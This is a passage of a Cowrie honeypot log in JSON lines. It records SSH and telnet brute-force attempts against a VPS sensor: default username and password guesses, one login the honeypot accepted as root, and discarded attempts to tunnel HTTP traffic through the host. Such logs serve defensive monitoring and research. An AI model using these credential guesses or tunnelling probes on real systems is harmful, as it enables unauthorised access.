.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:57:53.382765Z","src_ip":"212.227.125.160","session":"8abfc939300d"}
{"eventid":"cowrie.session.closed","duration":13.657313108444214,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:57:59.696795Z","src_ip":"212.227.125.160","session":"992d5ba2c146"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60812,"dst_ip":"1.2.3.4","dst_port":23,"session":"7e9525c873a6","protocol":"telnet","message":"New connection: 212.227.125.160:60812 (1.2.3.4:23) [session: 7e9525c873a6]","sensor":"my-vps","timestamp":"2025-08-31T03:57:59.896821Z"}
{"eventid":"cowrie.session.closed","duration":14.327643632888794,"message":"Connection lost after 14 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:58:00.940549Z","src_ip":"212.227.125.160","session":"118daa5763c3"}
{"eventid":"cowrie.session.closed","duration":12.804599285125732,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:58:01.068223Z","src_ip":"182.119.206.115","session":"8353de7c4179"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60818,"dst_ip":"1.2.3.4","dst_port":23,"session":"532856420343","protocol":"telnet","message":"New connection: 212.227.125.160:60818 (1.2.3.4:23) [session: 532856420343]","sensor":"my-vps","timestamp":"2025-08-31T03:58:01.177242Z"}
{"eventid":"cowrie.session.connect","src_ip":"182.119.206.115","src_port":55547,"dst_ip":"1.2.3.4","dst_port":23,"session":"15e682eed081","protocol":"telnet","message":"New connection: 182.119.206.115:55547 (1.2.3.4:23) [session: 15e682eed081]","sensor":"my-vps","timestamp":"2025-08-31T03:58:01.254901Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44850,"dst_ip":"1.2.3.4","dst_port":22,"session":"42fa38c4801f","protocol":"ssh","message":"New connection: 212.227.125.160:44850 (1.2.3.4:22) [session: 42fa38c4801f]","sensor":"my-vps","timestamp":"2025-08-31T03:58:01.420679Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47770,"dst_ip":"1.2.3.4","dst_port":22,"session":"3fcd1ed9104b","protocol":"ssh","message":"New connection: 212.227.235.229:47770 (1.2.3.4:22) [session: 3fcd1ed9104b]","sensor":"my-vps","timestamp":"2025-08-31T03:58:01.898105Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:58:01.899229Z","src_ip":"212.227.235.229","session":"3fcd1ed9104b"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:58:01.985235Z","src_ip":"212.227.125.160","session":"42fa38c4801f"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:58:01.986320Z","src_ip":"212.227.125.160","session":"42fa38c4801f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T03:58:02.212580Z","src_ip":"212.227.235.229","session":"3fcd1ed9104b"}
{"eventid":"cowrie.login.failed","username":"www","password":"QAZ@WSX","message":"login attempt [www/QAZ@WSX] failed","sensor":"my-vps","timestamp":"2025-08-31T03:58:03.676144Z","src_ip":"212.227.235.229","session":"3fcd1ed9104b"}
{"eventid":"cowrie.login.failed","username":"master","password":"letmein","message":"login attempt [master/letmein] failed","sensor":"my-vps","timestamp":"2025-08-31T03:58:04.491989Z","src_ip":"212.227.125.160","session":"42fa38c4801f"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:58:04.991181Z","src_ip":"212.227.235.229","session":"3fcd1ed9104b"}
{"eventid":"cowrie.session.closed","duration":13.620267868041992,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:58:05.717060Z","src_ip":"212.227.125.160","session":"d0a2dbb74bc3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60843,"dst_ip":"1.2.3.4","dst_port":23,"session":"c0901b677991","protocol":"telnet","message":"New connection: 212.227.125.160:60843 (1.2.3.4:23) [session: c0901b677991]","sensor":"my-vps","timestamp":"2025-08-31T03:58:05.960052Z"}
{"eventid":"cowrie.session.closed","duration":"4.6","message":"Connection lost after 4.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:58:06.001828Z","src_ip":"212.227.125.160","session":"42fa38c4801f"}
{"eventid":"cowrie.session.closed","duration":13.969506740570068,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:58:13.866227Z","src_ip":"212.227.125.160","session":"7e9525c873a6"}
{"eventid":"cowrie.session.closed","duration":12.797677755355835,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:58:14.052507Z","src_ip":"182.119.206.115","session":"15e682eed081"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":32788,"dst_ip":"1.2.3.4","dst_port":23,"session":"f7020bcffadc","protocol":"telnet","message":"New connection: 212.227.125.160:32788 (1.2.3.4:23) [session: f7020bcffadc]","sensor":"my-vps","timestamp":"2025-08-31T03:58:14.189997Z"}
{"eventid":"cowrie.session.connect","src_ip":"182.119.206.115","src_port":55852,"dst_ip":"1.2.3.4","dst_port":23,"session":"b8c5ded132c8","protocol":"telnet","message":"New connection: 182.119.206.115:55852 (1.2.3.4:23) [session: b8c5ded132c8]","sensor":"my-vps","timestamp":"2025-08-31T03:58:14.206382Z"}
{"eventid":"cowrie.session.closed","duration":13.259615898132324,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:58:14.436764Z","src_ip":"212.227.125.160","session":"532856420343"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":32793,"dst_ip":"1.2.3.4","dst_port":23,"session":"571c71b92b0a","protocol":"telnet","message":"New connection: 212.227.125.160:32793 (1.2.3.4:23) [session: 571c71b92b0a]","sensor":"my-vps","timestamp":"2025-08-31T03:58:14.710238Z"}
{"eventid":"cowrie.session.closed","duration":13.66686725616455,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:58:19.626848Z","src_ip":"212.227.125.160","session":"c0901b677991"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":32919,"dst_ip":"1.2.3.4","dst_port":23,"session":"bbb6f3884a6d","protocol":"telnet","message":"New connection: 212.227.125.160:32919 (1.2.3.4:23) [session: bbb6f3884a6d]","sensor":"my-vps","timestamp":"2025-08-31T03:58:19.818857Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58092,"dst_ip":"1.2.3.4","dst_port":22,"session":"f97b3c8d2b03","protocol":"ssh","message":"New connection: 212.227.235.229:58092 (1.2.3.4:22) [session: f97b3c8d2b03]","sensor":"my-vps","timestamp":"2025-08-31T03:58:26.704354Z"}
{"eventid":"cowrie.session.closed","duration":12.780515193939209,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:58:26.986836Z","src_ip":"182.119.206.115","session":"b8c5ded132c8"}
{"eventid":"cowrie.session.closed","duration":13.75002145767212,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:58:27.939333Z","src_ip":"212.227.125.160","session":"f7020bcffadc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33009,"dst_ip":"1.2.3.4","dst_port":23,"session":"0b1a7b75e07d","protocol":"telnet","message":"New connection: 212.227.125.160:33009 (1.2.3.4:23) [session: 0b1a7b75e07d]","sensor":"my-vps","timestamp":"2025-08-31T03:58:28.078802Z"}
{"eventid":"cowrie.session.closed","duration":13.729339361190796,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:58:28.439512Z","src_ip":"212.227.125.160","session":"571c71b92b0a"}
{"eventid":"cowrie.login.failed","username":"nginx","password":"123456","message":"login attempt [nginx/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T03:58:28.981472Z","src_ip":"212.227.125.160","session":"8abfc939300d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33011,"dst_ip":"1.2.3.4","dst_port":23,"session":"143c693a8549","protocol":"telnet","message":"New connection: 212.227.125.160:33011 (1.2.3.4:23) [session: 143c693a8549]","sensor":"my-vps","timestamp":"2025-08-31T03:58:29.604304Z"}
{"eventid":"cowrie.session.closed","duration":13.808207035064697,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:58:33.626992Z","src_ip":"212.227.125.160","session":"bbb6f3884a6d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33167,"dst_ip":"1.2.3.4","dst_port":23,"session":"415c8c2d2df4","protocol":"telnet","message":"New connection: 212.227.125.160:33167 (1.2.3.4:23) [session: 415c8c2d2df4]","sensor":"my-vps","timestamp":"2025-08-31T03:58:33.819074Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:58:35.400599Z","src_ip":"212.227.235.229","session":"f97b3c8d2b03"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:58:35.435609Z","src_ip":"212.227.235.229","session":"f97b3c8d2b03"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60862,"dst_ip":"1.2.3.4","dst_port":22,"session":"7ea6e2145fc5","protocol":"ssh","message":"New connection: 212.227.235.229:60862 (1.2.3.4:22) [session: 7ea6e2145fc5]","sensor":"my-vps","timestamp":"2025-08-31T03:58:39.398899Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:58:40.121235Z","src_ip":"212.227.235.229","session":"7ea6e2145fc5"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:58:40.122066Z","src_ip":"212.227.235.229","session":"7ea6e2145fc5"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":9339,"dst_ip":"1.2.3.4","dst_port":22,"session":"64a7b9965c3d","protocol":"ssh","message":"New connection: 77.83.207.83:9339 (1.2.3.4:22) [session: 64a7b9965c3d]","sensor":"my-vps","timestamp":"2025-08-31T03:58:41.251828Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:58:41.252503Z","src_ip":"77.83.207.83","session":"64a7b9965c3d"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:58:41.303017Z","src_ip":"77.83.207.83","session":"64a7b9965c3d"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:58:41.554270Z","src_ip":"77.83.207.83","session":"64a7b9965c3d"}
{"eventid":"cowrie.session.closed","duration":13.490378856658936,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:58:41.569038Z","src_ip":"212.227.125.160","session":"0b1a7b75e07d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":32005,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:32005","sensor":"my-vps","timestamp":"2025-08-31T03:58:41.605560Z","session":"64a7b9965c3d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:58:41.655951Z","src_ip":"77.83.207.83","session":"64a7b9965c3d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":27307,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:27307","sensor":"my-vps","timestamp":"2025-08-31T03:58:41.800909Z","session":"64a7b9965c3d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:58:41.851317Z","src_ip":"77.83.207.83","session":"64a7b9965c3d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33311,"dst_ip":"1.2.3.4","dst_port":23,"session":"024b93c8c265","protocol":"telnet","message":"New connection: 212.227.125.160:33311 (1.2.3.4:23) [session: 024b93c8c265]","sensor":"my-vps","timestamp":"2025-08-31T03:58:41.873781Z"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":3395,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:3395","sensor":"my-vps","timestamp":"2025-08-31T03:58:41.992676Z","session":"64a7b9965c3d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:58:42.043117Z","src_ip":"77.83.207.83","session":"64a7b9965c3d"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:58:42.094472Z","src_ip":"77.83.207.83","session":"64a7b9965c3d"}
{"eventid":"cowrie.session.closed","duration":"60.7","message":"Connection lost after 60.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:58:42.180109Z","src_ip":"212.227.125.160","session":"8abfc939300d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39674,"dst_ip":"1.2.3.4","dst_port":22,"session":"bccdcbd4b0b1","protocol":"ssh","message":"New connection: 212.227.125.160:39674 (1.2.3.4:22) [session: bccdcbd4b0b1]","sensor":"my-vps","timestamp":"2025-08-31T03:58:43.251938Z"}
{"eventid":"cowrie.session.closed","duration":13.710017442703247,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:58:43.314250Z","src_ip":"212.227.125.160","session":"143c693a8549"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33349,"dst_ip":"1.2.3.4","dst_port":23,"session":"97c6b8613752","protocol":"telnet","message":"New connection: 212.227.125.160:33349 (1.2.3.4:23) [session: 97c6b8613752]","sensor":"my-vps","timestamp":"2025-08-31T03:58:43.502653Z"}
{"eventid":"cowrie.login.failed","username":"master","password":"welcome","message":"login attempt [master/welcome] failed","sensor":"my-vps","timestamp":"2025-08-31T03:58:45.681561Z","src_ip":"212.227.235.229","session":"7ea6e2145fc5"}
{"eventid":"cowrie.session.closed","duration":"8.1","message":"Connection lost after 8.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:58:47.546986Z","src_ip":"212.227.235.229","session":"7ea6e2145fc5"}
{"eventid":"cowrie.session.closed","duration":13.838839530944824,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:58:47.657823Z","src_ip":"212.227.125.160","session":"415c8c2d2df4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33379,"dst_ip":"1.2.3.4","dst_port":23,"session":"526f71a44ef4","protocol":"telnet","message":"New connection: 212.227.125.160:33379 (1.2.3.4:23) [session: 526f71a44ef4]","sensor":"my-vps","timestamp":"2025-08-31T03:58:47.882721Z"}
{"eventid":"cowrie.session.closed","duration":13.812158107757568,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:58:55.685884Z","src_ip":"212.227.125.160","session":"024b93c8c265"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33551,"dst_ip":"1.2.3.4","dst_port":23,"session":"fc3034711bd1","protocol":"telnet","message":"New connection: 212.227.125.160:33551 (1.2.3.4:23) [session: fc3034711bd1]","sensor":"my-vps","timestamp":"2025-08-31T03:58:55.816913Z"}
{"eventid":"cowrie.session.closed","duration":13.962230443954468,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:58:57.464816Z","src_ip":"212.227.125.160","session":"97c6b8613752"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33568,"dst_ip":"1.2.3.4","dst_port":23,"session":"fd6e656fdc2a","protocol":"telnet","message":"New connection: 212.227.125.160:33568 (1.2.3.4:23) [session: fd6e656fdc2a]","sensor":"my-vps","timestamp":"2025-08-31T03:58:57.687224Z"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:59:00.080693Z","src_ip":"212.227.125.160","session":"17923d5586be"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52334,"dst_ip":"1.2.3.4","dst_port":22,"session":"50001a25d556","protocol":"ssh","message":"New connection: 212.227.125.160:52334 (1.2.3.4:22) [session: 50001a25d556]","sensor":"my-vps","timestamp":"2025-08-31T03:59:01.081594Z"}
{"eventid":"cowrie.session.closed","duration":13.42443060874939,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:59:01.307061Z","src_ip":"212.227.125.160","session":"526f71a44ef4"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:59:01.508406Z","src_ip":"212.227.125.160","session":"50001a25d556"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-s